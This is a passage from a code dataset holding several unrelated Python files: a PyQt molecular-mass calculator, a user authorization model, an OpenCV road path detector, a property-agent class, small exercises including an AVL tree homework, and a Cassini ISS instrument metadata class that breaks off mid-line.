symbol\r\n        symbol = match[0]\r\n        atom_mass = find_atom(symbol)\r\n        # Search numbers\r\n        number = match[1]\r\n        # print(atom_mass, number)\r\n        if number == \"\":\r\n            number = 1\r\n        else:\r\n            number = int(match[1])\r\n        MW = MW + float(atom_mass) * number\r\n        while number >= 1:\r\n            molecularFormula = molecularFormula + symbol\r\n            number -= 1\r\n    # print(molecularFormula)\r\n    # print(\"formula: \" + formula + \" MW = \" + str(MW))\r\n    s = round(MW, 2)\r\n    return s\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n    def __init__(self):\r\n
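        # initialise the QMainWindow base class before creating any widgets\r\n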
        QMainWindow.__init__(self)\r\n\r\n        # icon in window\r\n        self.setWindowIcon(QIcon('atom.png'))\r\n        # main window parameters\r\n        self.setMinimumSize(QSize(340, 300))\r\n        self.setWindowTitle(\"Chemical Calculator\")\r\n        # build the input fields\r\n        # enter formula line\r\n        self.nameLabel = QLabel(self)\r\n        self.nameLabel.setText('Enter formula')\r\n        self.line = QLineEdit(self)\r\n\r\n        # print label\r\n        self.nameLabel_4 = QLabel(self)\r\n        self.nameLabel_4.setText('Result')\r\n\r\n        # position the input fields\r\n        # first atom line\r\n        self.line.move(100, 20)\r\n        self.line.resize(200, 32)\r\n        self.nameLabel.move(20, 20)\r\n\r\n        # print label\r\n\r\n        self.nameLabel_4.move(20, 60)\r\n        self.nameLabel_4.resize(200, 62)\r\n        # button wired to the click handler\r\n        pushbutton = QPushButton('to count', self)\r\n        pushbutton.clicked.connect(self.clickMethod)\r\n        pushbutton.resize(200, 32)\r\n        pushbutton.move(80, 250)\r\n\r\n    def clickMethod(self):\r\n        # the formula string the user typed in\r\n        text1 = self.line.text()\r\n        q = str(text1)\r\n        b = moll_mass(q)\r\n        self.nameLabel_4.setText('Result: ' + 'Formula: ' + str(q) + '\\n' +\r\n                                 'Molecular Mass: ' + str(q) + ' = ' + str(b) + ' g/mol')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app = QtWidgets.QApplication(sys.argv)\r\n    mainWin = MainWindow()\r\n    mainWin.show()\r\n    sys.exit(app.exec_())\r\n","sub_path":"full_program_1.3.py","file_name":"full_program_1.3.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"578194934","text":"class AuthUserModel():\n    '''\n    Class holding a user's data\n    '''\n    # the user record\n    userData = None\n    # the session record\n    sessionData = None\n\n    def __dict__(self):\n        '''\n        Magic method that converts the class to a dict\n\n        :rtype: dict\n        :return:\n        '''\n        return {\n            \"user\" : {\n                \"surname\" : self.userData.surname,\n                \"name\" : self.userData.name,\n                \"secondname\" : self.userData.secondname,\n                \"dateBirth\" : self.userData.dateBirth\n            },\n            \"token\" : self.sessionData.token,\n            \"access\" : self.accessList(),\n            \"phone\" : self.phoneList()\n        }\n\n    def phoneList(self):\n        '''\n        Selects all of the user's phone numbers\n\n        :rtype: list\n        :return: res\n        '''\n        # list for the final results\n        res = []\n        from db2015 import linkUserPhone\n        # look up all of the user's phones\n        linkListPhone = linkUserPhone.getDb(twistedServer.config.get(\"auth\",{}).get(\"dbUse\",\"\"))\\\n            .query(linkUserPhone)\\\n            .filter(linkUserPhone.codeUser == self.userData.code)\\\n            .all()\n        # iterate over the phones\n        for linkPhone in linkListPhone:\n            # append the phone to the result list\n            res.append({\n                \"phone\" : \"+7\"+linkPhone.phone.numberCode+linkPhone.phone.numberBody,\n                \"type\" : linkPhone.phone.codeType\n            })\n        # return the result\n        return res\n\n    def accessList(self):\n        '''\n        Returns the list of the user's access codes\n\n        :rtype: list\n        :return: ret\n        '''\n        from db2015 import linkUserAccessView\n        # fetch all of the user's access codes\n        result = linkUserAccessView.getDb(twistedServer.config.get(\"auth\",{}).get(\"dbUse\",\"\"))\\\n            .query(linkUserAccessView.codeAccess)\\\n            .filter(linkUserAccessView.codeUser == self.userData.code)\\\n            .all()\n        # variable for the result\n        ret = []\n        # flatten the two-dimensional result into a flat list\n        for item in result:\n            ret.append(item[0])\n        # return the list of access codes\n        return ret\n\n    def isAccess(self, code=None):\n        '''\n        Checks whether the user has a given access code\n
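        (Accepts a single code or a list of codes.)\n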
\n        :type code: str | list\n        :param code: the access code(s) to check\n\n        :rtype: bool\n        :return: True on success, otherwise False\n        '''\n        # variable for the final value\n        access = False\n        # determine the code type (string or list of strings)\n        if isinstance(code, list):\n            # a list of strings\n            for itemCode in code:\n                # check whether the code is in the user's list of access codes\n                if itemCode in self.accessList():\n                    # if it is, set access to True\n                    access = True\n        elif isinstance(code, str):\n            # a single string\n            # check whether the code is in the user's list of access codes\n            if code in self.accessList():\n                # if it is, set access to True\n                access = True\n        # return access\n        return access\n\n    def sessionExtension(self):\n        '''\n        Extends the user's session\n\n        :rtype: bool\n        :return: True if the session was extended, False on failure\n        '''\n        from datetime import datetime, timedelta\n        # extend the session lifetime\n        self.sessionData.dateStop = (datetime.now() + timedelta(seconds=twistedServer.config.get(\"auth\",{}).get(\"sessionLifeTime\", 60)))\\\n            .timestamp()\n        # persist the new expiry date\n        if not self.sessionData.save():\n            # on error, return False\n            return False\n        return True\n\n    def sessionStop(self):\n        '''\n        Stops the user's session\n\n        :rtype: bool\n        :return: True if the session was stopped, False on failure\n        '''\n        # set the flag marking the session as stopped\n        self.sessionData.disable = True\n        # save the change\n        if not self.sessionData.save():\n            # on error, return False\n            return False\n        # all good, the session is stopped: True\n        return True","sub_path":"server/modules/authorization/authUserModel.py","file_name":"authUserModel.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"325760841","text":"import logging\nimport numpy as np\nimport cv2\n\nfrom scipy import ndimage\nfrom math import sin, cos, pi\n\nlogging.info('Path detector 1.0 has been initialized')\n\n\ndef detect(mask):\n\n    img_height, img_width = mask.shape\n    car_center = (img_width // 2, img_height)\n    path_img = np.zeros((img_height, img_width, 3), np.uint8)\n    cv2.circle(path_img, car_center, 4, (0, 0, 252), -1)\n\n    # find the possible directions and store them in path_dict:\n    # the important part of the code lives in find_directions()\n    path_dict, path_img = find_directions(mask, path_img, car_center)\n    max_left, max_right = find_min_max(mask, path_img, car_center)\n    for key in path_dict.keys():\n        angle = path_dict[key]\n        if angle is not None:\n            if angle < max_right:\n                path_dict[key] = max_right\n            elif angle > max_left:\n                path_dict[key] = max_left\n    path_dict[\"max_right\"] = max_right\n    path_dict[\"max_left\"] = max_left\n    return (path_dict, path_img)\n\n\ndef find_directions(mask, path_img, car_center):\n    \"\"\"Return a dictionary with the possible directions,\n    sorted into 3 main headings: left, straight ahead and right\"\"\"\n    last = False\n    img_height, img_width = mask.shape\n    path_dict = {'left': None, 'straight': None, 'right': None}\n    currentDirection = []\n    center = img_width//2, int(img_height*0.7)\n    r = img_height*0.25\n    # the loop scans each direction for a free path\n    angle = -10\n    while angle < 190:\n        p = int(center[0]+r*cos(angle*pi/180)), int(center[1]-r*sin(angle*pi/180))\n        # check whether the path towards p is free\n        edge = find_edge(mask, center, p)\n
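        # a distance of 100 means the probe reached its end without hitting an edge: the path is free\n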
        if edge[1] == 100:\n            # if the path is free, add the point to the currentDirection list\n            if not last:\n                currentDirection = [(edge[0], angle)]\n            else:\n                currentDirection.append((edge[0], angle))\n            last = True\n        else:\n            if last:\n                # we just moved from a free line to a blocked line,\n                # so this is the end of the currentDirection list:\n                # take the middle of currentDirection as the average direction\n                middle = currentDirection[len(currentDirection)//2]\n                midle_angle = middle[1]\n                direction = \"straight\"\n                if midle_angle > 130:\n                    direction = \"left\"\n                elif midle_angle < 50:\n                    direction = \"right\"\n                cv2.circle(path_img, middle[0], 4, (0, 0, 255), -1)\n                # add the heading matching this direction to the dictionary\n                # (detect() later clamps it so that it cannot point off the road)\n                path_dict[direction] = model_to_heading(middle[0], car_center)\n                last = False\n\n        cv2.circle(path_img, edge[0], 4, (0, 255, 0), -1)\n        cv2.line(path_img, center, p, (255, 0, 0))\n        angle += 5\n    return (path_dict, path_img)\n\n\ndef find_min_max(mask, path_img, car_center):\n    img_height, img_width = mask.shape\n    right_edge = (0, 0)\n    left_edge = (0, 0)\n    r = img_height*0.25\n    center = car_center\n    lst = []\n    angle = 45\n    while angle < 135:\n        origin = p = int(center[0]+r*cos(angle*pi/180)*0.6), int(center[1]-r*sin(angle*pi/180)*0.6)\n        p = int(center[0]+r*cos(angle*pi/180)), int(center[1]-r*sin(angle*pi/180))\n        # check whether the path towards p is free\n        edge = find_edge(mask, origin, p)\n        if edge[1] == 100:\n            lst.append(edge[0])\n        cv2.line(path_img, origin, p, (255, 0, 0))\n        angle += 5\n    if len(lst) > 1:\n        right_edge = lst[1]\n        left_edge = lst[-1]\n    else:\n        right_edge = left_edge = img_width//2, 0\n    cv2.circle(path_img, right_edge, 4, (0, 255, 0), -1)\n    cv2.circle(path_img, left_edge, 4, (0, 255, 0), -1)\n    return model_to_heading(left_edge, car_center), model_to_heading(right_edge, car_center)\n\n\ndef find_edge(mask, p0, p1):\n    \"\"\"Find the road edge in the direction p0->p1; return the point and its distance (from 0 to 100)\"\"\"\n    x_tab, y_tab, line_tab = profile(mask, p0, p1, 100)\n    non_zero = np.nonzero(line_tab)[0]\n    found = True\n    while non_zero.size > 4:\n        n = non_zero[0]\n        found = True\n        for i in range(1, 4):\n            if not non_zero[i] in range(n, n+7) and found:\n                non_zero = np.delete(non_zero, 0)\n                found = False\n        if found:\n            return [(int(x_tab[n]), int(y_tab[n])), n]\n    if non_zero.size != 0 and found:\n        n = non_zero[0]\n        return [(int(x_tab[n]), int(y_tab[n])), n]\n\n    return [p1, 100]\n\n\ndef model_to_heading(model_xy, car_center_xy):\n    \"\"\"Calculate the angle (in degrees) between the vertical line that\n    passes through the point `car_center_xy` and the line that connects\n    `car_center_xy` with `model_xy`.\n    A negative angle means that the car should turn clockwise; a positive\n    angle that the car should move counter-clockwise.\"\"\"\n    dx = 1. * model_xy[0] - car_center_xy[0]\n    dy = 1. 
* model_xy[1] - car_center_xy[1]\n heading = -np.arctan2(dx, -dy)*180/np.pi\n return heading\n\n\ndef profile(mask, p0, p1, num):\n \"\"\"Takes `num` equi-distance samples on the straight line between point `p0`\n and point `p2` on binary image `mask`.\n\n Here, points p0 and p1 are 2D points (x-coord,y-coord)\n\n Returns: a triple (n, m, vals) where:\n - n is a numpy array of size `num` containing the x-coordinates of\n sampled points\n - m is a numpy array of size `num` containing the y-coordinates of\n sampled points\n - vals is a numpy array of size `num` containing the sampled point\n values, i.e. vals[i] = mask[m[i], n[i]]\n (recall that images are indexed first on y-coordinate, then on\n x-coordinate)\n \"\"\"\n n = np.linspace(p0[0], p1[0], num)\n m = np.linspace(p0[1], p1[1], num)\n return [n, m, ndimage.map_coordinates(mask, [m, n], order=0)]\n","sub_path":"Orange Pi/path_detector.py","file_name":"path_detector.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"513651847","text":"from chapter3_case_study.HouseRental import HousePurchase, AppartmentRental, AppartmentPurchase, HouseRental\nfrom chapter3_case_study.helper_functions import get_valid_input\n\n\nclass Agent:\n def __init__(self):\n self.property_list = []\n self.type_map = {\n (\"house\",\"rental\"): HouseRental,\n (\"house\",\"purchase\"): HousePurchase,\n (\"appartment\",\"rental\"): AppartmentRental,\n (\"appartment\",\"purchase\"): AppartmentPurchase\n }\n\n def add_property(self):\n property_type = get_valid_input(\"What type of property? \",\n (\"house\",\"appartment\")).lower()\n payment_type = get_valid_input(\"What payment type? \",\n (\"purchase\",\"rental\")).lower()\n\n PropertyClass = self.type_map[(property_type, payment_type)]\n init_args = PropertyClass.prompt_init()\n self.property_list.append(PropertyClass(**init_args))\n\n def display_properties(self):\n for property in self.property_list:\n property.display()","sub_path":"chapter3_case_study/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"459748514","text":"# 27.Print all even numbers in range\n# a\nn = int(input(\"Enter range:\"))\nfor i in range(n+1):\n if i % 2 == 0:\n print(i)\n\n# b\ni = 0\nn=10\nwhile i <= n:\n if i % 2 == 0:\n print(i)\n i += 1","sub_path":"27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"118025032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 6 15:23:16 2021\n\n@author: Madeline Edmonds\nCPSC 330 Homework 4\n\nLast Edited: Friday Oct 15 2021\n\"\"\"\n\n# =============================================================================\n# Import random library for number generation\n# =============================================================================\nimport random\n\nclass TreeNode:\n def __init__(self, value):\n self.value = value\n self.left_child = None\n self.right_child = None\n# =============================================================================\n# Counting the height\n# =============================================================================\n self.height = 1\n\nclass AVLTree:\n def __init__(self):\n self.size = 0\n# =============================================================================\n# Count the number of left and right 
rotations\n# =============================================================================\n        self.numLeft = 0\n        self.numRight = 0\n\n    def num_nodes(self):\n        return self.size\n\n    def put(self, root, key):\n        if not root:\n            # count the node exactly once, where it is actually created\n            self.size = self.size + 1\n            return TreeNode(key)\n        elif key < root.value:\n            root.left_child = self.put(root.left_child, key)\n        else:\n            root.right_child = self.put(root.right_child, key)\n\n        root.height = 1 + max(self.getHeight(root.left_child),\n                              self.getHeight(root.right_child))\n\n# =============================================================================\n#     Update the balanceFactor\n# =============================================================================\n        balanceFactor = self.updateBalance(root)\n\n        if balanceFactor > 1 and key < root.left_child.value:\n            return self.rotateRight(root)\n\n        elif balanceFactor < -1 and key > root.right_child.value:\n            return self.rotateLeft(root)\n\n        elif balanceFactor > 1 and key > root.left_child.value:\n            root.left_child = self.rotateLeft(root.left_child)\n            return self.rotateRight(root)\n\n        elif balanceFactor < -1 and key < root.right_child.value:\n            root.right_child = self.rotateRight(root.right_child)\n            return self.rotateLeft(root)\n\n        return root\n# =============================================================================\n#     Left Rotation\n# =============================================================================\n    def rotateLeft(self, rotRoot):\n\n        self.numLeft += 1\n\n        newRoot = rotRoot.right_child\n        temp = newRoot.left_child\n\n        newRoot.left_child = rotRoot\n        rotRoot.right_child = temp\n        rotRoot.height = 1 + max(self.getHeight(rotRoot.left_child),\n                                 self.getHeight(rotRoot.right_child))\n        newRoot.height = 1 + max(self.getHeight(newRoot.left_child),\n                                 self.getHeight(newRoot.right_child))\n\n        return newRoot\n\n# =============================================================================\n#     Right Rotation\n# =============================================================================\n    def rotateRight(self, rotRoot):\n        self.numRight = self.numRight + 1\n\n        newRoot = rotRoot.left_child\n        t2 = newRoot.right_child\n\n        newRoot.right_child = rotRoot\n        rotRoot.left_child = t2\n\n        rotRoot.height = 1 + max(self.getHeight(rotRoot.left_child),\n                                 self.getHeight(rotRoot.right_child))\n        newRoot.height = 1 + max(self.getHeight(newRoot.left_child),\n                                 self.getHeight(newRoot.right_child))\n\n        return newRoot\n\n# =============================================================================\n#     Get the Height and Balance\n# =============================================================================\n\n    def getHeight(self, root):\n        if not root:\n            return 0\n        return root.height\n\n    def updateBalance(self, root):\n        if not root:\n            return 0\n        return self.getHeight(root.left_child) - self.getHeight(root.right_child)\n# =============================================================================\n#     Take the total of left rotations and the total number of right\n#     rotations and add them together\n# =============================================================================\n    def numRotate(self, root):\n        if not root:\n            return 0\n        return self.numLeft + self.numRight\n\n\n\navl2 = AVLTree()\n\navlList = random.sample(range(1, 10001), 1000)  # Generate a random unique list of 1000 numbers\n# =============================================================================\n#   Insert the numbers into the tree\n# =============================================================================\nroot2 = None\n\nfor i in range(1000):\n    root2 
= avl2.put(root2, avlList[i])\n\n\n# =============================================================================\n# print(avlList) WILL SHOW ALL NUMBERS IN THE LIST\n# =============================================================================\n\nprint(\"Rotations:\",avl2.numRotate(root2))\nprint(\"Height of Tree:\", avl2.getHeight(root2))","sub_path":"MEdmonds_CPSC330_Homework4.py","file_name":"MEdmonds_CPSC330_Homework4.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"605696120","text":"################################################################################\n# obs_instrument_coiss.py\n#\n# Defines the ObsInstrumentCOISS class, which encapsulates fields in the\n# common, obs_mission_cassini, and obs_instrument_coiss tables for\n# COISS_[12]xxx.\n################################################################################\n\nimport opus_support\n\nfrom obs_mission_cassini import (ObsMissionCassini,\n COISS_TARGET_DESC_MAPPING)\n\n\n# Wavelength information for combinations of filters\n# This data is from the ISS Data User's Guide Table A.2\n# When missing from there it is from the CISSCAL files na_effwl.tab\n# and wa_effwl.tab\n# (Camera, Filter1, Filter2): (Central wavelength, FWHM, Effective wavelength)\n# Values are in nm and must be converted to microns!\n_COISS_FILTER_WAVELENGTHS = {\n ('N', 'CL1', 'CL2'): (610.675, 340.056, 651.057),\n ('N', 'CL1', 'GRN'): (568.134, 113.019, 569.236),\n ('N', 'CL1', 'UV3'): (338.284, 68.0616, 343.136),\n ('N', 'CL1', 'BL2'): (439.923, 29.4692, 440.980),\n ('N', 'CL1', 'MT2'): (727.421, 4.11240, 727.415),\n ('N', 'CL1', 'CB2'): (750.505, 10.0129, 750.495),\n ('N', 'CL1', 'MT3'): (889.194, 10.4720, 889.196),\n ('N', 'CL1', 'CB3'): (937.964, 9.54761, 937.928),\n ('N', 'CL1', 'MT1'): (618.945, 3.68940, 618.949),\n ('N', 'CL1', 'CB1'): (619.381, 9.99526, 619.292),\n ('N', 'CL1', 'CB1A'): (602.908, 9.99526, 602.917),\n ('N', 'CL1', 'CB1B'): (634.531, 11.9658, 634.526),\n ('N', 'CL1', 'IR3'): (929.763, 66.9995, 928.304),\n ('N', 'CL1', 'IR1'): (751.894, 152.929, 750.048),\n ('N', 'RED', 'CL2'): (650.086, 149.998, 648.879),\n ('N', 'RED', 'GRN'): (601.032, 51.9801, 600.959),\n ('N', 'RED', 'MT2'): (726.633, 2.33906, 726.624),\n ('N', 'RED', 'CB2'): (744.255, 4.22393, 743.912),\n ('N', 'RED', 'MT1'): (618.911, 3.69858, 618.922),\n ('N', 'RED', 'CB1'): (619.568, 9.07488, 619.481),\n ('N', 'RED', 'IR3'): (695.435, 2.04887, 695.040),\n ('N', 'RED', 'IR1'): (701.900, 44.9603, 701.692),\n ('N', 'BL1', 'CL2'): (450.851, 102.996, 455.471),\n ('N', 'BL1', 'GRN'): (497.445, 5.00811, 497.435),\n ('N', 'BL1', 'UV3'): (386.571, 14.0295, 389.220),\n ('N', 'BL1', 'BL2'): (440.035, 29.6733, 441.077),\n ('N', 'UV2', 'CL2'): (297.880, 59.9535, 306.477),\n ('N', 'UV2', 'UV3'): (315.623, 28.9282, 317.609),\n ('N', 'UV1', 'CL2'): (258.098, 37.9542, 266.321),\n ('N', 'UV1', 'UV3'): (350.697, 9.07263, 353.878),\n ('N', 'IRPO', 'MT2'): (727.434, 4.11241, 727.424),\n ('N', 'IRPO', 'CB2'): (750.512, 10.0158, 750.501),\n ('N', 'IRPO', 'MT3'): (889.211, 10.4738, 889.208),\n ('N', 'IRPO', 'CB3'): (938.001, 9.54946, 937.961),\n ('N', 'IRPO', 'MT1'): (618.970, 3.69682, 618.967),\n ('N', 'IRPO', 'IR3'): (930.047, 67.9802, 928.583),\n ('N', 'IRPO', 'IR1'): (752.822, 153.994, 750.967),\n ('N', 'P120', 'GRN'): (568.532, 112.946, 569.630),\n ('N', 'P120', 'UV3'): (341.101, 66.0391, 345.492),\n ('N', 'P120', 'BL2'): (440.022, 29.4620, 441.079),\n ('N', 'P120', 'MT2'): (727.430, 
4.11216, 727.421),\n ('N', 'P120', 'CB2'): (750.535, 10.0307, 750.524),\n ('N', 'P120', 'MT1'): (618.908, 3.69299, 618.920),\n ('N', 'P120', 'CB1'): (619.961, 9.99561, 619.872),\n ('N', 'P60', 'GRN'): (568.532, 112.946, 569.630),\n ('N', 'P60', 'UV3'): (341.101, 66.0391, 345.492),\n ('N', 'P60', 'BL2'): (440.022, 29.4620, 441.079),\n ('N', 'P60', 'MT2'): (727.430, 4.11216, 727.421),\n ('N', 'P60', 'CB2'): (750.535, 10.0307, 750.524),\n ('N', 'P60', 'MT1'): (618.908, 3.69299, 618.920),\n ('N', 'P60', 'CB1'): (619.961, 9.99561, 619.872),\n ('N', 'P0', 'GRN'): (568.532, 112.946, 569.630),\n ('N', 'P0', 'UV3'): (341.101, 66.0391, 345.492),\n ('N', 'P0', 'BL2'): (440.022, 29.4620, 441.079),\n ('N', 'P0', 'MT2'): (727.430, 4.11216, 727.421),\n ('N', 'P0', 'CB2'): (750.535, 10.0307, 750.524),\n ('N', 'P0', 'MT1'): (618.908, 3.69299, 618.920),\n ('N', 'P0', 'CB1'): (619.961, 9.99561, 619.872),\n ('N', 'HAL', 'CL2'): (655.663, 9.26470, 655.621),\n ('N', 'HAL', 'GRN'): (648.028, 5.58862, 647.808),\n ('N', 'HAL', 'CB1'): (650.567, 2.73589, 650.466),\n ('N', 'HAL', 'IR1'): (663.476, 5.25757, 663.431),\n ('N', 'IR4', 'CL2'): (1002.40, 35.9966, 1001.91),\n ('N', 'IR4', 'IR3'): (996.723, 36.0700, 996.460),\n ('N', 'IR2', 'CL2'): (861.962, 97.0431, 861.066),\n ('N', 'IR2', 'MT3'): (889.176, 10.4655, 889.176),\n ('N', 'IR2', 'CB3'): (933.657, 3.71709, 933.593),\n ('N', 'IR2', 'IR3'): (901.843, 44.0356, 901.630),\n ('N', 'IR2', 'IR1'): (827.438, 28.0430, 827.331),\n ('W', 'CL1', 'CL2'): (634.928, 285.999, 633.817),\n ('W', 'CL1', 'RED'): (648.422, 150.025, 647.239),\n ('W', 'CL1', 'GRN'): (567.126, 123.999, 568.214),\n ('W', 'CL1', 'BL1'): (460.418, 62.2554, 462.865),\n ('W', 'CL1', 'VIO'): (419.684, 18.1825, 419.822),\n ('W', 'CL1', 'HAL'): (656.401, 9.96150, 656.386),\n ('W', 'CL1', 'IR1'): (741.456, 99.9735, 739.826),\n ('W', 'IR3', 'CL2'): (917.841, 45.3074, 916.727),\n ('W', 'IR3', 'RED'): (690.604, 3.04414, 689.959),\n ('W', 'IR3', 'IRP90'): (917.883, 45.3223, 916.770),\n ('W', 'IR3', 'IRP0'): (917.883, 45.3223, 916.770),\n ('W', 'IR3', 'IR1'): (790.007, 3.02556, 783.722),\n ('W', 'IR4', 'CL2'): (1002.36, 25.5330, 1001.88),\n ('W', 'IR4', 'IRP90'): (1002.44, 25.5299, 1001.98),\n ('W', 'IR4', 'IRP0'): (1002.44, 25.5299, 1001.98),\n ('W', 'IR5', 'CL2'): (1034.49, 19.4577, 1033.87),\n ('W', 'IR5', 'IRP90'): (1035.20, 19.4591, 1034.85),\n ('W', 'IR5', 'IRP0'): (1035.20, 19.4591, 1034.85),\n ('W', 'CB3', 'CL2'): (938.532, 9.95298, 938.445),\n ('W', 'CB3', 'IRP90'): (938.668, 9.95308, 938.611),\n ('W', 'CB3', 'IRP0'): (938.668, 9.95308, 938.611),\n ('W', 'MT3', 'CL2'): (890.340, 10.0116, 890.332),\n ('W', 'MT3', 'IRP90'): (890.368, 10.0118, 890.364),\n ('W', 'MT3', 'IRP0'): (890.368, 10.0118, 890.364),\n ('W', 'CB2', 'CL2'): (752.364, 10.0044, 752.354),\n ('W', 'CB2', 'RED'): (747.602, 4.07656, 747.317),\n ('W', 'CB2', 'IRP90'): (752.373, 10.0049, 752.363),\n ('W', 'CB2', 'IRP0'): (752.373, 10.0049, 752.363),\n ('W', 'CB2', 'IR1'): (752.324, 10.0026, 752.314),\n ('W', 'MT2', 'CL2'): (728.452, 4.00903, 728.418),\n ('W', 'MT2', 'RED'): (727.517, 2.05059, 727.507),\n ('W', 'MT2', 'IRP90'): (728.470, 4.00906, 728.435),\n ('W', 'MT2', 'IRP0'): (728.470, 4.00906, 728.435),\n ('W', 'MT2', 'IR1'): (728.293, 4.00906, 728.284),\n ('W', 'IR2', 'CL2'): (853.258, 54.8544, 852.448),\n ('W', 'IR2', 'IRP90'): (853.320, 54.8765, 852.510),\n ('W', 'IR2', 'IRP0'): (853.320, 54.8765, 852.510),\n ('W', 'IR2', 'IR1'): (826.348, 26.0795, 826.255),\n}\n# The following filter combinations are found in the data (through 
COISS_2111)\n# but aren't in the above table.\n# If one of the filters is a polarizer, we substitute it with CLEAR and see if\n# that works. Note that this isn't really a great choice - IRP especially has\n# a fairly narrow pass band. If this doesn't work or neither of the filters is\n# a polarizer, we just set the result to NULL. These combinations are often\n# silly anyway. Who wants IR2+UV3?\n# N/HAL/UV3\n# N/IR2/UV3\n# N/IR4/UV3\n# N/IRP0/CB1\n# N/IRP0/CB2\n# N/IRP0/CB3\n# N/IRP0/CL2\n# N/IRP0/GRN\n# N/IRP0/IR1\n# N/IRP0/IR3\n# N/IRP0/MT1\n# N/IRP0/MT2\n# N/IRP0/MT3\n# N/P0/CL2\n# N/P0/IR1\n# N/P0/IR3\n# N/P120/CL2\n# N/P120/IR1\n# N/P60/CL2\n# N/P60/IR1\n# N/RED/UV3\n# N/UV1/BL2\n# N/UV1/CB1\n# N/UV1/CB2\n# N/UV1/GRN\n# N/UV1/IR1\n# N/UV1/IR3\n# N/UV2/BL2\n# N/UV2/CB1\n# N/UV2/CB2\n# N/UV2/GRN\n# N/UV2/IR1\n# N/UV2/IR3\n# N/UV2/MT1\n# W/CB3/HAL\n# W/CB3/VIO\n# W/CL1/IRP0\n# W/CL1/IRP90\n# W/IR3/BL1\n# W/MT3/BL1\n\n\nclass ObsInstrumentCOISS(ObsMissionCassini):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n #############################\n ### OVERRIDE FROM ObsBase ###\n #############################\n\n @property\n def instrument_id(self):\n return 'COISS'\n\n def convert_filespec_from_lbl(self, filespec):\n return filespec.replace('.LBL', '.IMG')\n\n\n ################################\n ### OVERRIDE FROM ObsGeneral ###\n ################################\n\n def field_obs_general_observation_duration(self):\n return self._index_col('EXPOSURE_DURATION') / 1000\n\n # We occasionally don't bother to generate ring_geo data for COISS, like during\n # cruise, so just use the given RA/DEC from the index if needed. We don't make\n # any effort to figure out the min/max values.\n def field_obs_general_right_asc1(self):\n ra = self._ring_geo_index_col('MINIMUM_RIGHT_ASCENSION')\n if ra is not None:\n return ra\n return self._index_col('RIGHT_ASCENSION')\n\n def field_obs_general_right_asc2(self):\n ra = self._ring_geo_index_col('MAXIMUM_RIGHT_ASCENSION')\n if ra is not None:\n return ra\n return self._index_col('RIGHT_ASCENSION')\n\n def field_obs_general_declination1(self):\n ra = self._ring_geo_index_col('MINIMUM_DECLINATION')\n if ra is not None:\n return ra\n return self._index_col('DECLINATION')\n\n def field_obs_general_declination2(self):\n ra = self._ring_geo_index_col('MAXIMUM_DECLINATION')\n if ra is not None:\n return ra\n return self._index_col('DECLINATION')\n\n def field_obs_general_ring_obs_id(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n assert camera in ('N', 'W')\n filename = self._index_col('FILE_NAME')\n image_num = filename[1:11]\n planet = self._cassini_planet_id()\n if planet is None:\n pl_str = ''\n else:\n pl_str = planet[0]\n return f'{pl_str}_IMG_CO_ISS_{image_num}_{camera}'\n\n def field_obs_general_planet_id(self):\n return self._create_mult(self._cassini_planet_id())\n\n def _target_name(self):\n return [self._cassini_intended_target_name()]\n\n def field_obs_general_quantity(self):\n filter1, filter2 = self._index_col('FILTER_NAME')\n if filter1.startswith('UV') or filter2.startswith('UV'):\n return self._create_mult('EMISSION')\n return self._create_mult('REFLECT')\n\n def field_obs_general_observation_type(self):\n return self._create_mult('IMG') # Image\n\n\n ############################\n ### OVERRIDE FROM ObsPds ###\n ############################\n\n def field_obs_pds_note(self):\n return self._index_col('DESCRIPTION')\n\n\n ##################################\n ### OVERRIDE FROM ObsTypeImage ###\n 
##################################\n\n def field_obs_type_image_image_type_id(self):\n return self._create_mult('FRAM')\n\n def field_obs_type_image_duration(self):\n return self.field_obs_general_observation_duration()\n\n def field_obs_type_image_levels(self):\n return 4096\n\n def field_obs_type_image_greater_pixel_size(self):\n # For COISS, this is both greater and lesser pixel size\n inst_mode = self._index_col('INSTRUMENT_MODE_ID')\n if inst_mode == 'FULL':\n return 1024\n if inst_mode == 'SUM2':\n return 512\n if inst_mode == 'SUM4':\n return 256\n self._log_nonrepeating_error(f'Unknown INSTRUMENT_MODE_ID \"{inst_mode}\"')\n return None\n\n def field_obs_type_image_lesser_pixel_size(self):\n return self.field_obs_type_image_greater_pixel_size()\n\n\n ###################################\n ### OVERRIDE FROM ObsWavelength ###\n ###################################\n\n # See additional notes under _COISS_FILTER_WAVELENGTHS\n def _coiss_wavelength_helper(self, camera, filter1, filter2):\n key = (camera, filter1, filter2)\n if key in _COISS_FILTER_WAVELENGTHS:\n return _COISS_FILTER_WAVELENGTHS[key]\n\n # If we don't have the exact key combination, try to set polarization equal\n # to CLEAR for lack of anything better to do.\n nfilter1 = filter1 if filter1.find('P') == -1 else 'CL1'\n nfilter2 = filter2 if filter2.find('P') == -1 else 'CL2'\n key2 = (camera, nfilter1, nfilter2)\n if key2 in _COISS_FILTER_WAVELENGTHS:\n self._log_nonrepeating_warning(\n 'Using CLEAR instead of polarized filter for unknown COISS '+\n f'filter combination {key[0]}/{key[1]}/{key[2]}')\n return _COISS_FILTER_WAVELENGTHS[key2]\n\n self._log_nonrepeating_warning('Ignoring unknown COISS filter combination '+\n f'{key[0]}/{key[1]}/{key[2]}')\n return None, None, None\n\n def field_obs_wavelength_wavelength1(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n filter1, filter2 = self._index_col('FILTER_NAME')\n central_wl, fwhm, effective_wl = self._coiss_wavelength_helper(\n camera, 